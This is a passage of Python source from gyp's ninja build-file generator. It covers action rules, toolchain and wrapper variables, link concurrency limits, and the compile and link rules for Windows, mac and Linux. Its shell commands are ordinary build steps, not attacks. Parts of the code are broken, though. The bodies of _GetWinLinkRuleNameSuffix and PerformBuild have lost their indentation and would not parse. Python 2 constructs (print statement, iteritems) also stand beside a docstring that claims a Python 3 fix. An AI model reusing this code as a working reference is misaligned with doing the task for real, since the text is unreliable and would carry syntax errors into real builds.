  # Ninja rule names may only contain [a-zA-Z0-9_.-]; be conservative.
  rule_name = re.sub('[^a-zA-Z0-9_]', '_', rule_name)

  # Remove variable references, but not if they refer to the magic rule
  # variables. This is not quite right, as it also protects these for
  # actions, not just for rules where they are valid. Good enough.
  protect = [ '${root}', '${dirname}', '${source}', '${ext}', '${name}' ]
  protect = '(?!' + '|'.join(map(re.escape, protect)) + ')'
  description = re.sub(protect + r'\$', '_', description)

  # gyp dictates that commands are run from the base directory.
  # cd into the directory before running, and adjust paths in
  # the arguments to point to the proper locations.
  rspfile = None
  rspfile_content = None
  args = [self.ExpandSpecial(arg, self.base_to_build) for arg in args]
  if self.flavor == 'win':
    rspfile = rule_name + '.$unique_name.rsp'
    # The cygwin case handles this inside the bash sub-shell.
    run_in = '' if is_cygwin else ' ' + self.build_to_base
    if is_cygwin:
      rspfile_content = self.msvs_settings.BuildCygwinBashCommandLine(
          args, self.build_to_base)
    else:
      rspfile_content = gyp.msvs_emulation.EncodeRspFileList(args)
    command = ('%s gyp-win-tool action-wrapper $arch ' % sys.executable +
               rspfile + run_in)
  else:
    env = self.ComputeExportEnvString(env)
    command = gyp.common.EncodePOSIXShellList(args)
    command = 'cd %s; ' % self.build_to_base + env + command

  # GYP rules/actions express being no-ops by not touching their outputs.
  # Avoid executing downstream dependencies in this case by specifying
  # restat=1 to ninja.
  self.ninja.rule(rule_name, command, description, depfile=depfile,
                  restat=True, pool=pool,
                  rspfile=rspfile, rspfile_content=rspfile_content)
  self.ninja.newline()

  return rule_name, args
def CalculateVariables(default_variables, params):
  """Calculate additional variables for use in the build (called by gyp).

  Fills flavor-specific defaults into |default_variables| and, for mac
  and win, copies extra generator configuration from the Xcode / MSVS
  generators so the ninja generator stays in sync with them.
  """
  global generator_additional_non_configuration_keys
  global generator_additional_path_sections
  flavor = gyp.common.GetFlavor(params)
  if flavor == 'mac':
    default_variables.setdefault('OS', 'mac')
    default_variables.setdefault('SHARED_LIB_SUFFIX', '.dylib')
    default_variables.setdefault('SHARED_LIB_DIR',
                                 generator_default_variables['PRODUCT_DIR'])
    default_variables.setdefault('LIB_DIR',
                                 generator_default_variables['PRODUCT_DIR'])

    # Copy additional generator configuration data from Xcode, which is shared
    # by the Mac Ninja generator.
    import gyp.generator.xcode as xcode_generator
    generator_additional_non_configuration_keys = getattr(xcode_generator,
        'generator_additional_non_configuration_keys', [])
    generator_additional_path_sections = getattr(xcode_generator,
        'generator_additional_path_sections', [])
    global generator_extra_sources_for_rules
    generator_extra_sources_for_rules = getattr(xcode_generator,
        'generator_extra_sources_for_rules', [])
  elif flavor == 'win':
    exts = gyp.MSVSUtil.TARGET_TYPE_EXT
    default_variables.setdefault('OS', 'win')
    # Windows uses empty lib prefixes and VS-style extensions.
    default_variables['EXECUTABLE_SUFFIX'] = '.' + exts['executable']
    default_variables['STATIC_LIB_PREFIX'] = ''
    default_variables['STATIC_LIB_SUFFIX'] = '.' + exts['static_library']
    default_variables['SHARED_LIB_PREFIX'] = ''
    default_variables['SHARED_LIB_SUFFIX'] = '.' + exts['shared_library']

    # Copy additional generator configuration data from VS, which is shared
    # by the Windows Ninja generator.
    import gyp.generator.msvs as msvs_generator
    generator_additional_non_configuration_keys = getattr(msvs_generator,
        'generator_additional_non_configuration_keys', [])
    generator_additional_path_sections = getattr(msvs_generator,
        'generator_additional_path_sections', [])

    gyp.msvs_emulation.CalculateCommonVariables(default_variables, params)
  else:
    operating_system = flavor
    if flavor == 'android':
      operating_system = 'linux'  # Keep this legacy behavior for now.
    default_variables.setdefault('OS', operating_system)
    default_variables.setdefault('SHARED_LIB_SUFFIX', '.so')
    default_variables.setdefault('SHARED_LIB_DIR',
                                 os.path.join('$!PRODUCT_DIR', 'lib'))
    default_variables.setdefault('LIB_DIR',
                                 os.path.join('$!PRODUCT_DIR', 'obj'))
def ComputeOutputDir(params):
  """Return the path from the toplevel_dir to the build output directory."""
  # Where make would put its generated build files, relative to pwd; ninja
  # writes nothing there, but honoring it eases make -> ninja migration.
  gen_dir = os.path.relpath(params['options'].generator_output or '.')

  # The build directory relative to gen_dir (generator flag, default 'out').
  out_dir = params.get('generator_flags', {}).get('output_dir', 'out')

  # e.g. "out": relative path from the source root to our output files.
  return os.path.normpath(os.path.join(gen_dir, out_dir))
def CalculateGeneratorInputInfo(params):
  """Called by __init__ to initialize generator values based on params."""
  global generator_filelist_paths
  toplevel = params['options'].toplevel_dir
  # E.g. "out/gypfiles" resolved under the toplevel directory.
  qualified = os.path.normpath(
      os.path.join(toplevel, ComputeOutputDir(params), 'gypfiles'))
  generator_filelist_paths = {
      'toplevel': toplevel,
      'qualified_out_dir': qualified,
  }
def OpenOutput(path, mode='w'):
  """Open |path| with |mode|, creating any missing parent directories."""
  gyp.common.EnsureDirExists(path)
  return open(path, mode)
def CommandWithWrapper(cmd, wrappers, prog):
  """Return |prog| prefixed by the wrapper registered for |cmd| in
  |wrappers| (e.g. 'ccache gcc'); |prog| unchanged when no wrapper is
  registered."""
  wrapper = wrappers.get(cmd, '')
  return '%s %s' % (wrapper, prog) if wrapper else prog
def GetDefaultConcurrentLinks():
  """Returns a best-guess for a number of concurrent links.

  Honors GYP_LINK_CONCURRENCY when set; otherwise derives a limit from
  the machine's physical memory (links are memory-hungry).  Always
  returns an int >= 1 (fix: use floor division so Python 3's true
  division cannot produce a float pool depth).
  """
  pool_size = int(os.environ.get('GYP_LINK_CONCURRENCY', 0))
  if pool_size:
    return pool_size

  if sys.platform in ('win32', 'cygwin'):
    import ctypes

    class MEMORYSTATUSEX(ctypes.Structure):
      _fields_ = [
        ("dwLength", ctypes.c_ulong),
        ("dwMemoryLoad", ctypes.c_ulong),
        ("ullTotalPhys", ctypes.c_ulonglong),
        ("ullAvailPhys", ctypes.c_ulonglong),
        ("ullTotalPageFile", ctypes.c_ulonglong),
        ("ullAvailPageFile", ctypes.c_ulonglong),
        ("ullTotalVirtual", ctypes.c_ulonglong),
        ("ullAvailVirtual", ctypes.c_ulonglong),
        ("sullAvailExtendedVirtual", ctypes.c_ulonglong),
      ]

    stat = MEMORYSTATUSEX()
    stat.dwLength = ctypes.sizeof(stat)
    ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(stat))

    # VS 2015 uses 20% more working set than VS 2013 and can consume all RAM
    # on a 64 GB machine.
    mem_limit = max(1, stat.ullTotalPhys // (5 * (2 ** 30)))  # total / 5GB
    hard_cap = max(1, int(os.environ.get('GYP_LINK_CONCURRENCY_MAX', 2**32)))
    return min(mem_limit, hard_cap)
  elif sys.platform.startswith('linux'):
    if os.path.exists("/proc/meminfo"):
      with open("/proc/meminfo") as meminfo:
        memtotal_re = re.compile(r'^MemTotal:\s*(\d*)\s*kB')
        for line in meminfo:
          match = memtotal_re.match(line)
          if not match:
            continue
          # Allow 8Gb per link on Linux because Gold is quite memory hungry
          return max(1, int(match.group(1)) // (8 * (2 ** 20)))
    return 1
  elif sys.platform == 'darwin':
    try:
      avail_bytes = int(subprocess.check_output(['sysctl', '-n', 'hw.memsize']))
      # A static library debug build of Chromium's unit_tests takes ~2.7GB, so
      # 4GB per ld process allows for some more bloat.
      return max(1, avail_bytes // (4 * (2 ** 30)))  # total / 4GB
    except (OSError, subprocess.CalledProcessError, ValueError):
      # Narrowed from a bare `except:` which also swallowed
      # KeyboardInterrupt/SystemExit; fall back to a single link.
      return 1
  else:
    # TODO(scottmg): Implement this for other platforms.
    return 1
def _GetWinLinkRuleNameSuffix(embed_manifest):
"""Returns the suffix used to select an appropriate linking rule depending on
whether the manifest embedding is enabled."""
return '_embed' if embed_manifest else ''
def _AddWinLinkRules(master_ninja, embed_manifest):
  """Adds link rules for Windows platform to |master_ninja|.

  Registers 'link', 'solink' and 'solink_module' rules (with the
  manifest-embedding suffix from _GetWinLinkRuleNameSuffix), each driving
  the link through gyp-win-tool with a response file.
  """
  def FullLinkCommand(ldcmd, out, binary_type):
    """Wrap |ldcmd| in the gyp-win-tool link-with-manifests invocation."""
    # Resource id 1 is used for .exe manifests, 2 for .dll manifests.
    resource_name = {
      'exe': '1',
      'dll': '2',
    }[binary_type]
    return '%(python)s gyp-win-tool link-with-manifests $arch %(embed)s ' \
           '%(out)s "%(ldcmd)s" %(resname)s $mt $rc "$intermediatemanifest" ' \
           '$manifests' % {
      'python': sys.executable,
      'out': out,
      'ldcmd': ldcmd,
      'resname': resource_name,
      'embed': embed_manifest }
  rule_name_suffix = _GetWinLinkRuleNameSuffix(embed_manifest)
  use_separate_mspdbsrv = (
      int(os.environ.get('GYP_USE_SEPARATE_MSPDBSRV', '0')) != 0)
  dlldesc = 'LINK%s(DLL) $binary' % rule_name_suffix.upper()
  dllcmd = ('%s gyp-win-tool link-wrapper $arch %s '
            '$ld /nologo $implibflag /DLL /OUT:$binary '
            '@$binary.rsp' % (sys.executable, use_separate_mspdbsrv))
  dllcmd = FullLinkCommand(dllcmd, '$binary', 'dll')
  master_ninja.rule('solink' + rule_name_suffix,
                    description=dlldesc, command=dllcmd,
                    rspfile='$binary.rsp',
                    rspfile_content='$libs $in_newline $ldflags',
                    restat=True,
                    pool='link_pool')
  master_ninja.rule('solink_module' + rule_name_suffix,
                    description=dlldesc, command=dllcmd,
                    rspfile='$binary.rsp',
                    rspfile_content='$libs $in_newline $ldflags',
                    restat=True,
                    pool='link_pool')
  # Note that ldflags goes at the end so that it has the option of
  # overriding default settings earlier in the command line.
  exe_cmd = ('%s gyp-win-tool link-wrapper $arch %s '
             '$ld /nologo /OUT:$binary @$binary.rsp' %
             (sys.executable, use_separate_mspdbsrv))
  exe_cmd = FullLinkCommand(exe_cmd, '$binary', 'exe')
  master_ninja.rule('link' + rule_name_suffix,
                    description='LINK%s $binary' % rule_name_suffix.upper(),
                    command=exe_cmd,
                    rspfile='$binary.rsp',
                    rspfile_content='$in_newline $libs $ldflags',
                    pool='link_pool')
def GenerateOutputForConfig(target_list, target_dicts, data, params,
                            config_name):
  """Writes the ninja build files for a single configuration.

  Emits <toplevel>/<build_dir>/build.ninja containing the toolchain
  variables and the compile/link rules appropriate for the platform flavor,
  plus one per-target .ninja file (pulled in via subninja) for every target
  that produced any output.

  Args:
    target_list: list of qualified target names.
    target_dicts: dict mapping qualified target names to their gyp specs.
    data: loaded gyp build files, keyed by build-file path.
    params: generator parameters (options, generator_flags, build_files, ...).
    config_name: name of the configuration to generate, e.g. 'Debug'.
  """
  options = params['options']
  flavor = gyp.common.GetFlavor(params)
  generator_flags = params.get('generator_flags', {})

  # build_dir: relative path from source root to our output files.
  # e.g. "out/Debug"
  build_dir = os.path.normpath(
      os.path.join(ComputeOutputDir(params), config_name))

  toplevel_build = os.path.join(options.toplevel_dir, build_dir)

  master_ninja_file = OpenOutput(os.path.join(toplevel_build, 'build.ninja'))
  master_ninja = ninja_syntax.Writer(master_ninja_file, width=120)

  # Put build-time support tools in out/{config_name}.
  gyp.common.CopyTool(flavor, toplevel_build)

  # Grab make settings for CC/CXX.
  # The rules are
  # - The priority from low to high is gcc/g++, the 'make_global_settings' in
  #   gyp, the environment variable.
  # - If there is no 'make_global_settings' for CC.host/CXX.host or
  #   'CC_host'/'CXX_host' environment variable, cc_host/cxx_host should be set
  #   to cc/cxx.
  # Platform toolchain defaults; overridden below by make_global_settings
  # and/or environment variables.
  if flavor == 'win':
    ar = 'lib.exe'
    # cc and cxx must be set to the correct architecture by overriding with one
    # of cl_x86 or cl_x64 below.
    cc = 'UNSET'
    cxx = 'UNSET'
    ld = 'link.exe'
    ld_host = '$ld'
  else:
    ar = 'ar'
    cc = 'cc'
    cxx = 'c++'
    ld = '$cc'
    ldxx = '$cxx'
    ld_host = '$cc_host'
    ldxx_host = '$cxx_host'

  ar_host = 'ar'
  cc_host = None
  cxx_host = None
  cc_host_global_setting = None
  cxx_host_global_setting = None
  clang_cl = None
  nm = 'nm'
  nm_host = 'nm'
  readelf = 'readelf'
  readelf_host = 'readelf'

  build_file, _, _ = gyp.common.ParseQualifiedTarget(target_list[0])
  make_global_settings = data[build_file].get('make_global_settings', [])
  build_to_root = gyp.common.InvertRelativePath(build_dir,
                                                options.toplevel_dir)
  wrappers = {}
  # Apply tool overrides from the gyp-level 'make_global_settings'.
  for key, value in make_global_settings:
    if key == 'AR':
      ar = os.path.join(build_to_root, value)
    if key == 'AR.host':
      ar_host = os.path.join(build_to_root, value)
    if key == 'CC':
      cc = os.path.join(build_to_root, value)
      if cc.endswith('clang-cl'):
        clang_cl = cc
    if key == 'CXX':
      cxx = os.path.join(build_to_root, value)
    if key == 'CC.host':
      cc_host = os.path.join(build_to_root, value)
      cc_host_global_setting = value
    if key == 'CXX.host':
      cxx_host = os.path.join(build_to_root, value)
      cxx_host_global_setting = value
    if key == 'LD':
      ld = os.path.join(build_to_root, value)
    if key == 'LD.host':
      ld_host = os.path.join(build_to_root, value)
    if key == 'NM':
      nm = os.path.join(build_to_root, value)
    if key == 'NM.host':
      nm_host = os.path.join(build_to_root, value)
    if key == 'READELF':
      readelf = os.path.join(build_to_root, value)
    if key == 'READELF.host':
      readelf_host = os.path.join(build_to_root, value)
    if key.endswith('_wrapper'):
      wrappers[key[:-len('_wrapper')]] = os.path.join(build_to_root, value)

  # Support wrappers from environment variables too.
  for key, value in os.environ.iteritems():
    if key.lower().endswith('_wrapper'):
      key_prefix = key[:-len('_wrapper')]
      key_prefix = re.sub(r'\.HOST$', '.host', key_prefix)
      wrappers[key_prefix] = os.path.join(build_to_root, value)

  # On Windows, write the per-arch MSVS environment files and define the
  # per-arch compiler variables (cl_x86 / cl_x64).
  if flavor == 'win':
    configs = [target_dicts[qualified_target]['configurations'][config_name]
               for qualified_target in target_list]
    shared_system_includes = None
    if not generator_flags.get('ninja_use_custom_environment_files', 0):
      shared_system_includes = \
          gyp.msvs_emulation.ExtractSharedMSVSSystemIncludes(
              configs, generator_flags)
    cl_paths = gyp.msvs_emulation.GenerateEnvironmentFiles(
        toplevel_build, generator_flags, shared_system_includes, OpenOutput)
    for arch, path in cl_paths.iteritems():
      if clang_cl:
        # If we have selected clang-cl, use that instead.
        path = clang_cl
      command = CommandWithWrapper('CC', wrappers,
                                   QuoteShellArgument(path, 'win'))
      if clang_cl:
        # Use clang-cl to cross-compile for x86 or x86_64.
        command += (' -m32' if arch == 'x86' else ' -m64')
      master_ninja.variable('cl_' + arch, command)

  cc = GetEnvironFallback(['CC_target', 'CC'], cc)
  master_ninja.variable('cc', CommandWithWrapper('CC', wrappers, cc))
  cxx = GetEnvironFallback(['CXX_target', 'CXX'], cxx)
  master_ninja.variable('cxx', CommandWithWrapper('CXX', wrappers, cxx))

  if flavor == 'win':
    master_ninja.variable('ld', ld)
    master_ninja.variable('idl', 'midl.exe')
    master_ninja.variable('ar', ar)
    master_ninja.variable('rc', 'rc.exe')
    master_ninja.variable('ml_x86', 'ml.exe')
    master_ninja.variable('ml_x64', 'ml64.exe')
    master_ninja.variable('mt', 'mt.exe')
  else:
    master_ninja.variable('ld', CommandWithWrapper('LINK', wrappers, ld))
    master_ninja.variable('ldxx', CommandWithWrapper('LINK', wrappers, ldxx))
    master_ninja.variable('ar', GetEnvironFallback(['AR_target', 'AR'], ar))
    if flavor != 'mac':
      # Mac does not use readelf/nm for .TOC generation, so avoiding polluting
      # the master ninja with extra unused variables.
      master_ninja.variable(
          'nm', GetEnvironFallback(['NM_target', 'NM'], nm))
      master_ninja.variable(
          'readelf', GetEnvironFallback(['READELF_target', 'READELF'], readelf))

  if generator_supports_multiple_toolsets:
    if not cc_host:
      cc_host = cc
    if not cxx_host:
      cxx_host = cxx

    master_ninja.variable('ar_host', GetEnvironFallback(['AR_host'], ar_host))
    master_ninja.variable('nm_host', GetEnvironFallback(['NM_host'], nm_host))
    master_ninja.variable('readelf_host',
                          GetEnvironFallback(['READELF_host'], readelf_host))
    cc_host = GetEnvironFallback(['CC_host'], cc_host)
    cxx_host = GetEnvironFallback(['CXX_host'], cxx_host)

    # The environment variable could be used in 'make_global_settings', like
    # ['CC.host', '$(CC)'] or ['CXX.host', '$(CXX)'], transform them here.
    if '$(CC)' in cc_host and cc_host_global_setting:
      cc_host = cc_host_global_setting.replace('$(CC)', cc)
    if '$(CXX)' in cxx_host and cxx_host_global_setting:
      cxx_host = cxx_host_global_setting.replace('$(CXX)', cxx)
    master_ninja.variable('cc_host',
                          CommandWithWrapper('CC.host', wrappers, cc_host))
    master_ninja.variable('cxx_host',
                          CommandWithWrapper('CXX.host', wrappers, cxx_host))
    if flavor == 'win':
      master_ninja.variable('ld_host', ld_host)
    else:
      master_ninja.variable('ld_host', CommandWithWrapper(
          'LINK', wrappers, ld_host))
      master_ninja.variable('ldxx_host', CommandWithWrapper(
          'LINK', wrappers, ldxx_host))

  master_ninja.newline()

  master_ninja.pool('link_pool', depth=GetDefaultConcurrentLinks())
  master_ninja.newline()

  # 'deps' selects ninja's dependency-processing mode for the compile rules
  # below: parse /showIncludes output on MSVC, gcc-style depfiles elsewhere.
  deps = 'msvc' if flavor == 'win' else 'gcc'

  if flavor != 'win':
    master_ninja.rule(
      'cc',
      description='CC $out',
      command=('$cc -MMD -MF $out.d $defines $includes $cflags $cflags_c '
               '$cflags_pch_c -c $in -o $out'),
      depfile='$out.d',
      deps=deps)
    master_ninja.rule(
      'cc_s',
      description='CC $out',
      command=('$cc $defines $includes $cflags $cflags_c '
               '$cflags_pch_c -c $in -o $out'))
    master_ninja.rule(
      'cxx',
      description='CXX $out',
      command=('$cxx -MMD -MF $out.d $defines $includes $cflags $cflags_cc '
               '$cflags_pch_cc -c $in -o $out'),
      depfile='$out.d',
      deps=deps)
  else:
    # TODO(scottmg) Separate pdb names is a test to see if it works around
    # http://crbug.com/142362. It seems there's a race between the creation of
    # the .pdb by the precompiled header step for .cc and the compilation of
    # .c files. This should be handled by mspdbsrv, but rarely errors out with
    #   c1xx : fatal error C1033: cannot open program database
    # By making the rules target separate pdb files this might be avoided.
    cc_command = ('ninja -t msvc -e $arch ' +
                  '-- '
                  '$cc /nologo /showIncludes /FC '
                  '@$out.rsp /c $in /Fo$out /Fd$pdbname_c ')
    cxx_command = ('ninja -t msvc -e $arch ' +
                   '-- '
                   '$cxx /nologo /showIncludes /FC '
                   '@$out.rsp /c $in /Fo$out /Fd$pdbname_cc ')
    master_ninja.rule(
      'cc',
      description='CC $out',
      command=cc_command,
      rspfile='$out.rsp',
      rspfile_content='$defines $includes $cflags $cflags_c',
      deps=deps)
    master_ninja.rule(
      'cxx',
      description='CXX $out',
      command=cxx_command,
      rspfile='$out.rsp',
      rspfile_content='$defines $includes $cflags $cflags_cc',
      deps=deps)
    master_ninja.rule(
      'idl',
      description='IDL $in',
      command=('%s gyp-win-tool midl-wrapper $arch $outdir '
               '$tlb $h $dlldata $iid $proxy $in '
               '$midl_includes $idlflags' % sys.executable))
    master_ninja.rule(
      'rc',
      description='RC $in',
      # Note: $in must be last otherwise rc.exe complains.
      command=('%s gyp-win-tool rc-wrapper '
               '$arch $rc $defines $resource_includes $rcflags /fo$out $in' %
               sys.executable))
    master_ninja.rule(
      'asm',
      description='ASM $out',
      command=('%s gyp-win-tool asm-wrapper '
               '$arch $asm $defines $includes $asmflags /c /Fo $out $in' %
               sys.executable))

  if flavor != 'mac' and flavor != 'win':
    master_ninja.rule(
      'alink',
      description='AR $out',
      command='rm -f $out && $ar rcs $arflags $out $in')
    master_ninja.rule(
      'alink_thin',
      description='AR $out',
      command='rm -f $out && $ar rcsT $arflags $out $in')

    # This allows targets that only need to depend on $lib's API to declare an
    # order-only dependency on $lib.TOC and avoid relinking such downstream
    # dependencies when $lib changes only in non-public ways.
    # The resulting string leaves an uninterpolated %{suffix} which
    # is used in the final substitution below.
    mtime_preserving_solink_base = (
        'if [ ! -e $lib -o ! -e $lib.TOC ]; then '
        '%(solink)s && %(extract_toc)s > $lib.TOC; else '
        '%(solink)s && %(extract_toc)s > $lib.tmp && '
        'if ! cmp -s $lib.tmp $lib.TOC; then mv $lib.tmp $lib.TOC ; '
        'fi; fi'
        % { 'solink':
              '$ld -shared $ldflags -o $lib -Wl,-soname=$soname %(suffix)s',
            'extract_toc':
              ('{ $readelf -d $lib | grep SONAME ; '
               '$nm -gD -f p $lib | cut -f1-2 -d\' \'; }')})

    master_ninja.rule(
      'solink',
      description='SOLINK $lib',
      restat=True,
      command=mtime_preserving_solink_base % {'suffix': '@$link_file_list'},
      rspfile='$link_file_list',
      rspfile_content=
          '-Wl,--whole-archive $in $solibs -Wl,--no-whole-archive $libs',
      pool='link_pool')
    master_ninja.rule(
      'solink_module',
      description='SOLINK(module) $lib',
      restat=True,
      command=mtime_preserving_solink_base % {'suffix': '@$link_file_list'},
      rspfile='$link_file_list',
      rspfile_content='-Wl,--start-group $in -Wl,--end-group $solibs $libs',
      pool='link_pool')
    master_ninja.rule(
      'link',
      description='LINK $out',
      command=('$ld $ldflags -o $out '
               '-Wl,--start-group $in -Wl,--end-group $solibs $libs'),
      pool='link_pool')
  elif flavor == 'win':
    master_ninja.rule(
        'alink',
        description='LIB $out',
        command=('%s gyp-win-tool link-wrapper $arch False '
                 '$ar /nologo /ignore:4221 /OUT:$out @$out.rsp' %
                 sys.executable),
        rspfile='$out.rsp',
        rspfile_content='$in_newline $libflags')
    _AddWinLinkRules(master_ninja, embed_manifest=True)
    _AddWinLinkRules(master_ninja, embed_manifest=False)
  else:
    master_ninja.rule(
      'objc',
      description='OBJC $out',
      command=('$cc -MMD -MF $out.d $defines $includes $cflags $cflags_objc '
               '$cflags_pch_objc -c $in -o $out'),
      depfile='$out.d',
      deps=deps)
    master_ninja.rule(
      'objcxx',
      description='OBJCXX $out',
      command=('$cxx -MMD -MF $out.d $defines $includes $cflags $cflags_objcc '
               '$cflags_pch_objcc -c $in -o $out'),
      depfile='$out.d',
      deps=deps)
    master_ninja.rule(
      'alink',
      description='LIBTOOL-STATIC $out, POSTBUILDS',
      command='rm -f $out && '
              './gyp-mac-tool filter-libtool libtool $libtool_flags '
              '-static -o $out $in'
              '$postbuilds')
    master_ninja.rule(
      'lipo',
      description='LIPO $out, POSTBUILDS',
      command='rm -f $out && lipo -create $in -output $out$postbuilds')
    master_ninja.rule(
      'solipo',
      description='SOLIPO $out, POSTBUILDS',
      command=(
          'rm -f $lib $lib.TOC && lipo -create $in -output $lib$postbuilds &&'
          '%(extract_toc)s > $lib.TOC'
          % { 'extract_toc':
                '{ otool -l $lib | grep LC_ID_DYLIB -A 5; '
                'nm -gP $lib | cut -f1-2 -d\' \' | grep -v U$$; true; }'}))

    # Record the public interface of $lib in $lib.TOC. See the corresponding
    # comment in the posix section above for details.
    solink_base = '$ld %(type)s $ldflags -o $lib %(suffix)s'
    mtime_preserving_solink_base = (
        'if [ ! -e $lib -o ! -e $lib.TOC ] || '
        # Always force dependent targets to relink if this library
        # reexports something. Handling this correctly would require
        # recursive TOC dumping but this is rare in practice, so punt.
        'otool -l $lib | grep -q LC_REEXPORT_DYLIB ; then '
        '%(solink)s && %(extract_toc)s > $lib.TOC; '
        'else '
        '%(solink)s && %(extract_toc)s > $lib.tmp && '
        'if ! cmp -s $lib.tmp $lib.TOC; then '
        'mv $lib.tmp $lib.TOC ; '
        'fi; '
        'fi'
        % { 'solink': solink_base,
            'extract_toc':
              '{ otool -l $lib | grep LC_ID_DYLIB -A 5; '
              'nm -gP $lib | cut -f1-2 -d\' \' | grep -v U$$; true; }'})

    solink_suffix = '@$link_file_list$postbuilds'
    master_ninja.rule(
      'solink',
      description='SOLINK $lib, POSTBUILDS',
      restat=True,
      command=mtime_preserving_solink_base % {'suffix': solink_suffix,
                                              'type': '-shared'},
      rspfile='$link_file_list',
      rspfile_content='$in $solibs $libs',
      pool='link_pool')
    master_ninja.rule(
      'solink_notoc',
      description='SOLINK $lib, POSTBUILDS',
      restat=True,
      command=solink_base % {'suffix':solink_suffix, 'type': '-shared'},
      rspfile='$link_file_list',
      rspfile_content='$in $solibs $libs',
      pool='link_pool')
    master_ninja.rule(
      'solink_module',
      description='SOLINK(module) $lib, POSTBUILDS',
      restat=True,
      command=mtime_preserving_solink_base % {'suffix': solink_suffix,
                                              'type': '-bundle'},
      rspfile='$link_file_list',
      rspfile_content='$in $solibs $libs',
      pool='link_pool')
    master_ninja.rule(
      'solink_module_notoc',
      description='SOLINK(module) $lib, POSTBUILDS',
      restat=True,
      command=solink_base % {'suffix': solink_suffix, 'type': '-bundle'},
      rspfile='$link_file_list',
      rspfile_content='$in $solibs $libs',
      pool='link_pool')
    master_ninja.rule(
      'link',
      description='LINK $out, POSTBUILDS',
      command=('$ld $ldflags -o $out '
               '$in $solibs $libs$postbuilds'),
      pool='link_pool')
    master_ninja.rule(
      'preprocess_infoplist',
      description='PREPROCESS INFOPLIST $out',
      command=('$cc -E -P -Wno-trigraphs -x c $defines $in -o $out && '
               'plutil -convert xml1 $out $out'))
    master_ninja.rule(
      'copy_infoplist',
      description='COPY INFOPLIST $in',
      command='$env ./gyp-mac-tool copy-info-plist $in $out $binary $keys')
    master_ninja.rule(
      'merge_infoplist',
      description='MERGE INFOPLISTS $in',
      command='$env ./gyp-mac-tool merge-info-plist $out $in')
    master_ninja.rule(
      'compile_xcassets',
      description='COMPILE XCASSETS $in',
      command='$env ./gyp-mac-tool compile-xcassets $keys $in')
    master_ninja.rule(
      'mac_tool',
      description='MACTOOL $mactool_cmd $in',
      command='$env ./gyp-mac-tool $mactool_cmd $in $out $binary')
    master_ninja.rule(
      'package_framework',
      description='PACKAGE FRAMEWORK $out, POSTBUILDS',
      command='./gyp-mac-tool package-framework $out $version$postbuilds '
              '&& touch $out')

  # Platform-neutral utility rules (implemented by the per-platform tools).
  if flavor == 'win':
    master_ninja.rule(
      'stamp',
      description='STAMP $out',
      command='%s gyp-win-tool stamp $out' % sys.executable)
    master_ninja.rule(
      'copy',
      description='COPY $in $out',
      command='%s gyp-win-tool recursive-mirror $in $out' % sys.executable)
  else:
    master_ninja.rule(
      'stamp',
      description='STAMP $out',
      command='${postbuilds}touch $out')
    master_ninja.rule(
      'copy',
      description='COPY $in $out',
      command='rm -rf $out && cp -af $in $out')
  master_ninja.newline()

  all_targets = set()
  for build_file in params['build_files']:
    for target in gyp.common.AllTargets(target_list,
                                        target_dicts,
                                        os.path.normpath(build_file)):
      all_targets.add(target)
  all_outputs = set()

  # target_outputs is a map from qualified target name to a Target object.
  target_outputs = {}
  # target_short_names is a map from target short name to a list of Target
  # objects.
  target_short_names = {}

  # short name of targets that were skipped because they didn't contain anything
  # interesting.
  # NOTE: there may be overlap between this and non_empty_target_names.
  empty_target_names = set()

  # Set of non-empty short target names.
  # NOTE: there may be overlap between this and empty_target_names.
  non_empty_target_names = set()

  # Write one .ninja file per target and pull it into the master file.
  for qualified_target in target_list:
    # qualified_target is like: third_party/icu/icu.gyp:icui18n#target
    build_file, name, toolset = \
        gyp.common.ParseQualifiedTarget(qualified_target)

    this_make_global_settings = data[build_file].get('make_global_settings', [])
    assert make_global_settings == this_make_global_settings, (
        "make_global_settings needs to be the same for all targets. %s vs. %s" %
        (this_make_global_settings, make_global_settings))

    spec = target_dicts[qualified_target]
    if flavor == 'mac':
      gyp.xcode_emulation.MergeGlobalXcodeSettingsToSpec(data[build_file], spec)

    # If build_file is a symlink, we must not follow it because there's a chance
    # it could point to a path above toplevel_dir, and we cannot correctly deal
    # with that case at the moment.
    build_file = gyp.common.RelativePath(build_file, options.toplevel_dir,
                                         False)

    qualified_target_for_hash = gyp.common.QualifiedTarget(build_file, name,
                                                           toolset)
    hash_for_rules = hashlib.md5(qualified_target_for_hash).hexdigest()

    base_path = os.path.dirname(build_file)
    obj = 'obj'
    if toolset != 'target':
      obj += '.' + toolset
    output_file = os.path.join(obj, base_path, name + '.ninja')

    ninja_output = StringIO()
    writer = NinjaWriter(hash_for_rules, target_outputs, base_path, build_dir,
                         ninja_output,
                         toplevel_build, output_file,
                         flavor, toplevel_dir=options.toplevel_dir)

    target = writer.WriteSpec(spec, config_name, generator_flags)

    if ninja_output.tell() > 0:
      # Only create files for ninja files that actually have contents.
      with OpenOutput(os.path.join(toplevel_build, output_file)) as ninja_file:
        ninja_file.write(ninja_output.getvalue())
      ninja_output.close()
      master_ninja.subninja(output_file)

    if target:
      if name != target.FinalOutput() and spec['toolset'] == 'target':
        target_short_names.setdefault(name, []).append(target)
      target_outputs[qualified_target] = target
      if qualified_target in all_targets:
        all_outputs.add(target.FinalOutput())
        non_empty_target_names.add(name)
    else:
      empty_target_names.add(name)

  if target_short_names:
    # Write a short name to build this target. This benefits both the
    # "build chrome" case as well as the gyp tests, which expect to be
    # able to run actions and build libraries by their short name.
    master_ninja.newline()
    master_ninja.comment('Short names for targets.')
    for short_name in target_short_names:
      master_ninja.build(short_name, 'phony', [x.FinalOutput() for x in
                                               target_short_names[short_name]])

  # Write phony targets for any empty targets that weren't written yet. As
  # short names are not necessarily unique only do this for short names that
  # haven't already been output for another target.
  empty_target_names = empty_target_names - non_empty_target_names
  if empty_target_names:
    master_ninja.newline()
    master_ninja.comment('Empty targets (output for completeness).')
    for name in sorted(empty_target_names):
      master_ninja.build(name, 'phony')

  if all_outputs:
    master_ninja.newline()
    master_ninja.build('all', 'phony', list(all_outputs))
    master_ninja.default(generator_flags.get('default_target', 'all'))

  master_ninja_file.close()
def PerformBuild(data, configurations, params):
options = params['options']
for config in configurations:
builddir = os.path.join(options.toplevel_dir, 'out', config)
arguments = ['ninja', '-C', builddir]
print 'Building [%s]: %s' % (config, arguments)
subprocess.check_call(arguments)
def CallGenerateOutputForConfig(arglist):
  """Worker-process entry point: unpacks one arglist tuple and generates
  the ninja files for that configuration."""
  # SIGINT is ignored here so that Ctrl-C reaches only the parent process,
  # which then kills all multiprocessing children.
  signal.signal(signal.SIGINT, signal.SIG_IGN)
